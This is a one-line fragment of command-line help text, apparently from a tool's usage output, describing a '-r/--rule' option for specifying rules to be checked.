    -r RULE, --rule RULE Rules need to be checked

